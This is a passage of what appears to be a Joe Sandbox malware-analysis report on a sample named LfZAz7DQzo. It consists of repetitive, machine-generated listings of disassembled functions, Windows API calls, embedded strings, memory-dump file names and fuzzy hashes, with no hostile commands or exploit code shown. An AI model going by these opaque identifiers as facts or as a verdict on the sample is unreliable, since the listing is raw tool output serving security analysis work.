                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                                        • Instruction ID: 014e750beb16fe409623332eef42b35b069d5f770033ccc041f59de917ffe095
                                        • Opcode Fuzzy Hash: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                                        • Instruction Fuzzy Hash: 3B514275B00209AFDB18CF68DD85AAEBBBAFB88310F14812DF515E7290D770AD05DB10
                                        Function 00E821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetSysColor.USER32(0000000F), ref: 00E821D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                                        • Instruction ID: bf2ab0ecd9e385a8fe99921a9f3fb135e8a77d3d95539fa78d77bfbf459665aa
                                        • Opcode Fuzzy Hash: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                                        • Instruction Fuzzy Hash: 4141A331104144AFDB256F68EC48BB93B65FB06335F285269FE6DAA1F2C7318C42EB51
                                        Function 00EEAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,00F0F910), ref: 00EEAB76
                                        • GetDriveTypeW.KERNEL32(00000061,00F3A620,00000061), ref: 00EEAC40
                                        • _wcscpy.LIBCMT ref: 00EEAC6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharDriveLowerType_wcscpy
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2820617543-1000479233
                                        • Opcode ID: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                                        • Instruction ID: cbe5dbe95e006a68367ddd03723550236ecf9a23ad4d3d3d808e480bbeadb0d4
                                        • Opcode Fuzzy Hash: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                                        • Instruction Fuzzy Hash: BD51AF311083459BC714EF15C881AAAB7E5EF85314F18682DF49ABB2A2DB31ED49CB53
                                        Function 00E89997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __i64tow__itow__swprintf
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 421087845-2263619337
                                        • Opcode ID: 6f95c34340dd586ad5a9076d1fb77842d5217a5c9958e6921cada13b2fdf9273
                                        • Instruction ID: f84bb826110476b03327f31be0779ef63cf84629bd4c647fbd30b0d0add98501
                                        • Opcode Fuzzy Hash: 6f95c34340dd586ad5a9076d1fb77842d5217a5c9958e6921cada13b2fdf9273
                                        • Instruction Fuzzy Hash: 01411631A04205AEDB24EB78DC41EB773E8EF89314F2454AEF54DF6292EA71E8418711
                                        Function 00F073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00F073D9
                                        • CreateMenu.USER32 ref: 00F073F4
                                        • SetMenu.USER32(?,00000000), ref: 00F07403
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F07490
                                        • IsMenu.USER32(?), ref: 00F074A6
                                        • CreatePopupMenu.USER32 ref: 00F074B0
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F074DD
                                        • DrawMenuBar.USER32 ref: 00F074E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                        • String ID: 0$F
                                        • API String ID: 176399719-3044882817
                                        • Opcode ID: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                                        • Instruction ID: 569c6818aea54fe8a2241d5dfe664687c935887ab4f9115c5020e9632e9968d7
                                        • Opcode Fuzzy Hash: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                                        • Instruction Fuzzy Hash: 91413879A00349EFDB20EF64D884AAABBF5FF49310F144069FD55A73A0D731A924EB50
                                        Function 00F0772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F077CD
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F077D4
                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F077E7
                                        • SelectObject.GDI32(00000000,00000000), ref: 00F077EF
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F077FA
                                        • DeleteDC.GDI32(00000000), ref: 00F07803
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F0780D
                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F07821
                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F0782D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                        • String ID: static
                                        • API String ID: 2559357485-2160076837
                                        • Opcode ID: 02e658f63cfd3b71f0e5a1343b65e26b5f42f391d2d48572e66b37e5c7c6f48c
                                        • Instruction ID: 95bf0a261b782b1bac333b0da54dfe98d945f66b9894dbc2fbe45708a2623c1a
                                        • Opcode Fuzzy Hash: 02e658f63cfd3b71f0e5a1343b65e26b5f42f391d2d48572e66b37e5c7c6f48c
                                        • Instruction Fuzzy Hash: D3317031505219BBDF21AF64DC08FDA3BA9FF09761F114224FA15A60E0C735E825FBA4
                                        Function 00EA7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EA707B
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • __gmtime64_s.LIBCMT ref: 00EA7114
                                        • __gmtime64_s.LIBCMT ref: 00EA714A
                                        • __gmtime64_s.LIBCMT ref: 00EA7167
                                        • __allrem.LIBCMT ref: 00EA71BD
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA71D9
                                        • __allrem.LIBCMT ref: 00EA71F0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA720E
                                        • __allrem.LIBCMT ref: 00EA7225
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7243
                                        • __invoke_watson.LIBCMT ref: 00EA72B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                        • String ID:
                                        • API String ID: 384356119-0
                                        • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                        • Instruction ID: f0fcc78370526dcf3584963edbf503dfc98c2431918715f7d84a270982b40a75
                                        • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                        • Instruction Fuzzy Hash: 6671CAB1A04716ABD714DE79CC8179BB7E8AF1A324F14523AF554FA281E770F9408790
                                        Function 00EE2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2A31
                                        • GetMenuItemInfoW.USER32(00F46890,000000FF,00000000,00000030), ref: 00EE2A92
                                        • SetMenuItemInfoW.USER32(00F46890,00000004,00000000,00000030), ref: 00EE2AC8
                                        • Sleep.KERNEL32(000001F4), ref: 00EE2ADA
                                        • GetMenuItemCount.USER32(?), ref: 00EE2B1E
                                        • GetMenuItemID.USER32(?,00000000), ref: 00EE2B3A
                                        • GetMenuItemID.USER32(?,-00000001), ref: 00EE2B64
                                        • GetMenuItemID.USER32(?,?), ref: 00EE2BA9
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE2BEF
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C03
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                                        • Instruction ID: 16fc07d01070a59204a394e26ed519f3f1540654067ea62d332f4514b4048760
                                        • Opcode Fuzzy Hash: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                                        • Instruction Fuzzy Hash: A5617CB090028DAFDB21CF65CC88ABEBBBCFB41308F14556DEA41A7251D771AD45EB21
                                        Function 00F07192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F07214
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F07217
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0723B
                                        • _memset.LIBCMT ref: 00F0724C
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F0725E
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F072D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                                        • Instruction ID: aeb64efceb8cf3a9e8579c982b9e5f0c12d3171a9fec153b459a3db09756f1a5
                                        • Opcode Fuzzy Hash: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                                        • Instruction Fuzzy Hash: 0C613975900308AFDB20EFA4CC81EEE77F8AB09714F144199FA15E72E1D774A945EB60
                                        Function 00ED710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00ED7135
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00ED718E
                                        • VariantInit.OLEAUT32(?), ref: 00ED71A0
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ED71C0
                                        • VariantCopy.OLEAUT32(?,?), ref: 00ED7213
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ED7227
                                        • VariantClear.OLEAUT32(?), ref: 00ED723C
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00ED7249
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED7252
                                        • VariantClear.OLEAUT32(?), ref: 00ED7264
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED726F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                                        • Instruction ID: 5b94f6944a0e2c81bdf778cca14ad79ce52db088b75ef12a964bca18d34103fd
                                        • Opcode Fuzzy Hash: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                                        • Instruction Fuzzy Hash: 5F415075904219AFCF14DFA4DC849AEBBB8FF08354F00906AF955E7761DB30A946CB90
                                        Function 00EF9428 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 263COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                        • API String ID: 2862541840-1765764032
                                        • Opcode ID: 86784cfa05b41c6e6344222a1375ccf81d7e85acc8baf77c98b11a648907f450
                                        • Instruction ID: f2e949e68bace125e4eb3edeb9858172a41295ede709dfc1a0a9f23206e3093f
                                        • Opcode Fuzzy Hash: 86784cfa05b41c6e6344222a1375ccf81d7e85acc8baf77c98b11a648907f450
                                        • Instruction Fuzzy Hash: C791DE70A00219ABDF24DFA5C884FAEB7B8EF85314F109059F655FB282D7709905CFA0
                                        Function 00EF5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 00EF5AA6
                                        • inet_addr.WS2_32(?), ref: 00EF5AEB
                                        • gethostbyname.WS2_32(?), ref: 00EF5AF7
                                        • IcmpCreateFile.IPHLPAPI ref: 00EF5B05
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B75
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B8B
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF5C00
                                        • WSACleanup.WS2_32 ref: 00EF5C06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: f944b13b21c1e9c2e487a6427dc6aab37b483860354b5bb9e6e3733009139d5e
                                        • Instruction ID: 1f88d0aa32f56145398357eb9838f7bc15d65a15214b2298d622238e7439387c
                                        • Opcode Fuzzy Hash: f944b13b21c1e9c2e487a6427dc6aab37b483860354b5bb9e6e3733009139d5e
                                        • Instruction Fuzzy Hash: 365181326047049FDB20AF24CC49B7AB7E4EF58714F149969F65AFB2A1DB70E804DB42
                                        Function 00E962F2 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • argument not compiled in 16 bit mode, xrefs: 00ED1150
                                        • failed to get memory, xrefs: 00E96488
                                        • ERCP, xrefs: 00E96313
                                        • argument is not a compiled regular expression, xrefs: 00ED1160
                                        • internal error: opcode not recognized, xrefs: 00E9647D
                                        • internal error: missing capturing bracket, xrefs: 00ED1158
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$_memmove
                                        • String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
                                        • API String ID: 2532777613-264027815
                                        • Opcode ID: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                                        • Instruction ID: 25a8374c2b898d3a67b77cfd0fb72098019d3eb661717191b1c1c02df1fa0648
                                        • Opcode Fuzzy Hash: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                                        • Instruction Fuzzy Hash: 0551B1719007099BDF24CFA5C8917AABBF4FF04718F20956FEA5AEB241E771A581CB40
                                        Function 00EEB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEB73B
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEB7B1
                                        • GetLastError.KERNEL32 ref: 00EEB7BB
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEB828
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
